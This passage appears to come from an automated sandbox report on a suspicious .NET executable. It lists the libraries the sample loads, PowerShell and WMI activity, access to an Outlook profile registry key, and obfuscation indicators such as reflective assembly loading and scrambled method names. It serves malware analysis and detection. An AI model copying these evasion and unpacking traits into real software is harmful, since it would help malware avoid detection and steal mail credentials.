Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: NXPYoHNSgv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: NXPYoHNSgv.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: NXPYoHNSgv.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: jBGm.pdb source: NXPYoHNSgv.exe
Source: Binary string: jBGm.pdbSHA256 source: NXPYoHNSgv.exe

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: NXPYoHNSgv.exe, Form1.cs .Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.NXPYoHNSgv.exe.5860000.5.raw.unpack, RZ.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, RVlDSAOxRVyxPMKF9i.cs .Net Code: XmLIBgxePp System.Reflection.Assembly.Load(byte[])
Source: 0.2.NXPYoHNSgv.exe.2e348f4.0.raw.unpack, RZ.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, RVlDSAOxRVyxPMKF9i.cs .Net Code: XmLIBgxePp System.Reflection.Assembly.Load(byte[])
Source: 0.2.NXPYoHNSgv.exe.40bdee0.2.raw.unpack, RVlDSAOxRVyxPMKF9i.cs .Net Code: XmLIBgxePp System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_02DDF463 push esp; iretd 0_2_02DDF539
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_02DDF508 push esp; iretd 0_2_02DDF539
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_07534E50 pushfd ; retf 0_2_07534E5D
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 0_2_0753754F pushfd ; ret 0_2_0753755F
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_032146F5 pushad ; iretd 5_2_03214705
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC9241 push es; ret 5_2_06FC9244
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC2DC0 pushfd ; retf 5_2_06FC2DC1
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0719C692 push eax; ret 5_2_0719C699
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_0719CF58 push eax; iretd 5_2_0719CF59
Source: NXPYoHNSgv.exe Static PE information: section name: .text entropy: 7.987793915288752
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, NwjUkYRhiPbBYX4Oni.cs High entropy of concatenated method names: 'Dispose', 'k7fWbFH3tU', 'TLVChmiNFA', 'CNwHHBhxLj', 'sTKWEDA4WR', 'kyhWzeC6jd', 'ProcessDialogKey', 'MCiCQMlxVD', 'tOMCW3J9pV', 'SltCCXZn5Q'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, AMpeOLxWWVXed15Rjv.cs High entropy of concatenated method names: 'ToString', 'GnFo98CTIf', 'D4OohJv35X', 'uBnoev1iYR', 'AA4o4VGt2c', 'eesoFGMfIp', 'znooAqJKNB', 'rVLo5GqGLq', 'Os8ol5utK6', 'X7xoDs7Wpo'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, LUP0OQ4ibQ0iEvSMlh.cs High entropy of concatenated method names: 'TdQjq5py2r', 'T1MjdZAPff', 'cwjjB4j1uP', 'eEUjmVpCVu', 'LMejJSWTp8', 'K6yjaDgKkG', 'DZBjKAPcZ7', 'NcAjpYY9WC', 'txX0Rw35lvPAMqr24r0', 'NyiBH93E93eC8ZXvQFU'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, TYUqd0pPkDFMPFLRHL.cs High entropy of concatenated method names: 'zu7XTICENi', 'gsSXaGY7FX', 'iZpkeOxKos', 'yhok4rZvol', 'c3XkFCArMK', 'McukAFM9U4', 'B20k5y9Cef', 'E7CklAcGJu', 'gcnkDNP8VL', 'z3nkrjZN7v'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, f36uE85AbUbcp2P0xd.cs High entropy of concatenated method names: 'RJeigbUcQD', 'a1cikJwjQq', 'BBMijQI2iF', 'mM3jEcEjZx', 'nDZjzD4ZTF', 'cSSiQbWWZ2', 'PwJiWldnak', 'EhUiC1qERZ', 'hC4i6r77xl', 'MT4iIhoiXV'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, cBr4uhCU8o8Cy8bf2T.cs High entropy of concatenated method names: 'JeBBW5rd2', 'MOymKCdeX', 'zR4Jx94S7', 'pJiaDlK4S', 'TQCKI5NrF', 'Mkdp37s2o', 'IOyRnxIsDk27LLXGn6', 'XU6wGd0pmf26TO5B2D', 'p1yZyAmBr', 'BH7PxsCGs'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, o1d9gStgXVOlEGar3e.cs High entropy of concatenated method names: 'psfjshgaOZ', 'PFYjRg07HF', 'SXyjX4gAoo', 'Gp1jiAN9cL', 'wy4jOtUQd7', 'aEBXyONbN6', 'oCDXVneKMq', 'nyUXNU4Yl0', 'fB3XvmXyoB', 'd94Xbsl0id'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, aRwY22Vs0Gal2sm3Ao.cs High entropy of concatenated method names: 'TPrnvJuTsx', 'op2nEThVt7', 'IYAZQ4tOfN', 'LFjZWHVurs', 'Tphn9oysW6', 'k6rn3UBhJG', 'tKBnMFFRuo', 'P0MnYCptpn', 'DpInH0D0x5', 'KYEnxQIvYY'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, D1Xaa2kb4p1B4Tw15W.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'yAQCb5hS6l', 'KtkCEsYuXR', 'xqhCzuZ1Ql', 'X276QJQ4vB', 'x6L6WxhikG', 'oKs6CL6Pr3', 'vFq665xxKp', 'TlC7eQJB2GuLdeLo0N2'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, NSqt8wWQ2RrVNunr9qC.cs High entropy of concatenated method names: 'nYEUdGWIq0', 'QBbU02dcqB', 'FSaUB5gTCS', 'o3AUm5fhFY', 'JvWUTPN1m9', 'NV5UJGasKL', 'OgcUafgMNi', 'w27USQjrtN', 'ICIUKCCXWb', 'T5gUppjTGq'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, jMlxVDb7OM3J9pVxlt.cs High entropy of concatenated method names: 'c07Zt3UlHb', 's9nZhetuqX', 'vRhZegZWNK', 'FJJZ4Q23r9', 'TpoZYL4AJL', 'yOTZFb1Y6G', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, XGFAS78spoJBcDbmwR.cs High entropy of concatenated method names: 'eUAncETVhn', 'XIqnfpNKR3', 'ToString', 'Ea5ng0KJTp', 'dcFnRNOhKT', 'NYKnkGfEKK', 'SBpnXvHPlm', 'VuLnjZNbLt', 'xSRnicmMpX', 'aDZnOes3Km'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, hZn5QLEbNAmkl46PVu.cs High entropy of concatenated method names: 'Ap5UWwR1DB', 'QDiU6KvI8f', 'Hj2UI0cbvV', 'EZsUgkj0Aj', 'umTURv1YN4', 'xfRUX5PDou', 'd9xUjuh4tY', 'wu4ZN974W5', 'YSAZvNCPUY', 'p7JZb3Jne5'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, BKDA4WvROyheC6jdlC.cs High entropy of concatenated method names: 'f2EZgn1cgf', 'DqGZRHaKAV', 'jSAZkC5g5q', 'zG7ZXPRlIp', 'CRnZj1oYxD', 'W9pZiVZYE8', 'WZvZOG1gB9', 'AbxZwqUr2T', 'MBhZcrKONf', 'MGmZfc7c17'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, EI9VY7W6CndmTPHTju9.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QqNPYCkFgg', 'dalPHWhknr', 'wdxPxvmUnB', 'obxP8dpaip', 'xghPyK1lu7', 'IyFPV1lyh7', 'rfRPNNwl9q'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, IFqjIiKhx4dgIGrjAv.cs High entropy of concatenated method names: 'D2Ykmppgjp', 'Re2kJJW8wl', 'KJVkSBGIi8', 'LNIkKmHFIG', 'tBFkLPAjdt', 'ohkkoDDOsm', 'HDDknhqQLu', 'EJ2kZE83ru', 'cECkUCQTun', 'yCIkPGEYEO'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, yEojYxIQkDkYwMfXZl.cs High entropy of concatenated method names: 'upQWiLPFeb', 'XotWO9WYKQ', 'jhxWc4dgIG', 'NjAWfv8YUq', 'JLRWLHLL1d', 'OgSWogXVOl', 'a2qVSbW86td4nghNCJ', 'DUuROCT55Lrxg3pOmD', 'HqwWWgEo8F', 'CDeW6PfT3T'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, aLPFebSbot9WYKQxSZ.cs High entropy of concatenated method names: 'ECYRYrbR3j', 'FyoRH847w5', 'lAlRx8eKw5', 'aHpR8E7qi1', 'qrFRyCeIST', 'AjORVb66IE', 'fHARNnL469', 'W2NRvKNhvn', 'ei4Rbw51s8', 'CftREyLudR'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, G1Nsw9DieHrvsA5hvT.cs High entropy of concatenated method names: 'wkuidIT7h1', 'ypli0o453a', 'OwfiBg8Cd6', 'F9wimfX4Ie', 'Qc6iTCjfkK', 'KeQiJpt9dl', 'fobiakKxQ2', 'MhOiShl1DS', 'xYLiKf8OsK', 'BQTippNqyK'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, KEObGFMDeIOfWIcUYG.cs High entropy of concatenated method names: 'Q271Sgqyyc', 'OAS1KfimiV', 'kvm1tAQUCy', 'LcZ1hdaoWr', 'TWr14wMVwF', 'L1A1F9iSbS', 'qxd15ilv5j', 'yb31ltvbKN', 'v0n1repiVH', 'ChU19XaMFA'
Source: 0.2.NXPYoHNSgv.exe.7460000.6.raw.unpack, RVlDSAOxRVyxPMKF9i.cs High entropy of concatenated method names: 'QVQ6sRo4Qc', 'uP86gZ5IM0', 'Nek6RGR836', 'tRV6kZMrP2', 'uGb6X81rUj', 'Mfp6jsEgaJ', 'nqT6ijfA2J', 'Ajt6ObMokK', 'uwL6w8sKxi', 'w7L6cSV64g'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, NwjUkYRhiPbBYX4Oni.cs High entropy of concatenated method names: 'Dispose', 'k7fWbFH3tU', 'TLVChmiNFA', 'CNwHHBhxLj', 'sTKWEDA4WR', 'kyhWzeC6jd', 'ProcessDialogKey', 'MCiCQMlxVD', 'tOMCW3J9pV', 'SltCCXZn5Q'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, AMpeOLxWWVXed15Rjv.cs High entropy of concatenated method names: 'ToString', 'GnFo98CTIf', 'D4OohJv35X', 'uBnoev1iYR', 'AA4o4VGt2c', 'eesoFGMfIp', 'znooAqJKNB', 'rVLo5GqGLq', 'Os8ol5utK6', 'X7xoDs7Wpo'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, LUP0OQ4ibQ0iEvSMlh.cs High entropy of concatenated method names: 'TdQjq5py2r', 'T1MjdZAPff', 'cwjjB4j1uP', 'eEUjmVpCVu', 'LMejJSWTp8', 'K6yjaDgKkG', 'DZBjKAPcZ7', 'NcAjpYY9WC', 'txX0Rw35lvPAMqr24r0', 'NyiBH93E93eC8ZXvQFU'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, TYUqd0pPkDFMPFLRHL.cs High entropy of concatenated method names: 'zu7XTICENi', 'gsSXaGY7FX', 'iZpkeOxKos', 'yhok4rZvol', 'c3XkFCArMK', 'McukAFM9U4', 'B20k5y9Cef', 'E7CklAcGJu', 'gcnkDNP8VL', 'z3nkrjZN7v'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, f36uE85AbUbcp2P0xd.cs High entropy of concatenated method names: 'RJeigbUcQD', 'a1cikJwjQq', 'BBMijQI2iF', 'mM3jEcEjZx', 'nDZjzD4ZTF', 'cSSiQbWWZ2', 'PwJiWldnak', 'EhUiC1qERZ', 'hC4i6r77xl', 'MT4iIhoiXV'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, cBr4uhCU8o8Cy8bf2T.cs High entropy of concatenated method names: 'JeBBW5rd2', 'MOymKCdeX', 'zR4Jx94S7', 'pJiaDlK4S', 'TQCKI5NrF', 'Mkdp37s2o', 'IOyRnxIsDk27LLXGn6', 'XU6wGd0pmf26TO5B2D', 'p1yZyAmBr', 'BH7PxsCGs'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, o1d9gStgXVOlEGar3e.cs High entropy of concatenated method names: 'psfjshgaOZ', 'PFYjRg07HF', 'SXyjX4gAoo', 'Gp1jiAN9cL', 'wy4jOtUQd7', 'aEBXyONbN6', 'oCDXVneKMq', 'nyUXNU4Yl0', 'fB3XvmXyoB', 'd94Xbsl0id'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, aRwY22Vs0Gal2sm3Ao.cs High entropy of concatenated method names: 'TPrnvJuTsx', 'op2nEThVt7', 'IYAZQ4tOfN', 'LFjZWHVurs', 'Tphn9oysW6', 'k6rn3UBhJG', 'tKBnMFFRuo', 'P0MnYCptpn', 'DpInH0D0x5', 'KYEnxQIvYY'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, D1Xaa2kb4p1B4Tw15W.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'yAQCb5hS6l', 'KtkCEsYuXR', 'xqhCzuZ1Ql', 'X276QJQ4vB', 'x6L6WxhikG', 'oKs6CL6Pr3', 'vFq665xxKp', 'TlC7eQJB2GuLdeLo0N2'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, NSqt8wWQ2RrVNunr9qC.cs High entropy of concatenated method names: 'nYEUdGWIq0', 'QBbU02dcqB', 'FSaUB5gTCS', 'o3AUm5fhFY', 'JvWUTPN1m9', 'NV5UJGasKL', 'OgcUafgMNi', 'w27USQjrtN', 'ICIUKCCXWb', 'T5gUppjTGq'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, jMlxVDb7OM3J9pVxlt.cs High entropy of concatenated method names: 'c07Zt3UlHb', 's9nZhetuqX', 'vRhZegZWNK', 'FJJZ4Q23r9', 'TpoZYL4AJL', 'yOTZFb1Y6G', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, XGFAS78spoJBcDbmwR.cs High entropy of concatenated method names: 'eUAncETVhn', 'XIqnfpNKR3', 'ToString', 'Ea5ng0KJTp', 'dcFnRNOhKT', 'NYKnkGfEKK', 'SBpnXvHPlm', 'VuLnjZNbLt', 'xSRnicmMpX', 'aDZnOes3Km'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, hZn5QLEbNAmkl46PVu.cs High entropy of concatenated method names: 'Ap5UWwR1DB', 'QDiU6KvI8f', 'Hj2UI0cbvV', 'EZsUgkj0Aj', 'umTURv1YN4', 'xfRUX5PDou', 'd9xUjuh4tY', 'wu4ZN974W5', 'YSAZvNCPUY', 'p7JZb3Jne5'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, BKDA4WvROyheC6jdlC.cs High entropy of concatenated method names: 'f2EZgn1cgf', 'DqGZRHaKAV', 'jSAZkC5g5q', 'zG7ZXPRlIp', 'CRnZj1oYxD', 'W9pZiVZYE8', 'WZvZOG1gB9', 'AbxZwqUr2T', 'MBhZcrKONf', 'MGmZfc7c17'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, EI9VY7W6CndmTPHTju9.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'QqNPYCkFgg', 'dalPHWhknr', 'wdxPxvmUnB', 'obxP8dpaip', 'xghPyK1lu7', 'IyFPV1lyh7', 'rfRPNNwl9q'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, IFqjIiKhx4dgIGrjAv.cs High entropy of concatenated method names: 'D2Ykmppgjp', 'Re2kJJW8wl', 'KJVkSBGIi8', 'LNIkKmHFIG', 'tBFkLPAjdt', 'ohkkoDDOsm', 'HDDknhqQLu', 'EJ2kZE83ru', 'cECkUCQTun', 'yCIkPGEYEO'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, yEojYxIQkDkYwMfXZl.cs High entropy of concatenated method names: 'upQWiLPFeb', 'XotWO9WYKQ', 'jhxWc4dgIG', 'NjAWfv8YUq', 'JLRWLHLL1d', 'OgSWogXVOl', 'a2qVSbW86td4nghNCJ', 'DUuROCT55Lrxg3pOmD', 'HqwWWgEo8F', 'CDeW6PfT3T'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, aLPFebSbot9WYKQxSZ.cs High entropy of concatenated method names: 'ECYRYrbR3j', 'FyoRH847w5', 'lAlRx8eKw5', 'aHpR8E7qi1', 'qrFRyCeIST', 'AjORVb66IE', 'fHARNnL469', 'W2NRvKNhvn', 'ei4Rbw51s8', 'CftREyLudR'
Source: 0.2.NXPYoHNSgv.exe.3f146c0.4.raw.unpack, G1Nsw9DieHrvsA5hvT.cs High entropy of concatenated method names: 'wkuidIT7h1', 'ypli0o453a', 'OwfiBg8Cd6', 'F9wimfX4Ie', 'Qc6iTCjfkK', 'KeQiJpt9dl', 'fobiakKxQ2', 'MhOiShl1DS', 'xYLiKf8OsK', 'BQTippNqyK'
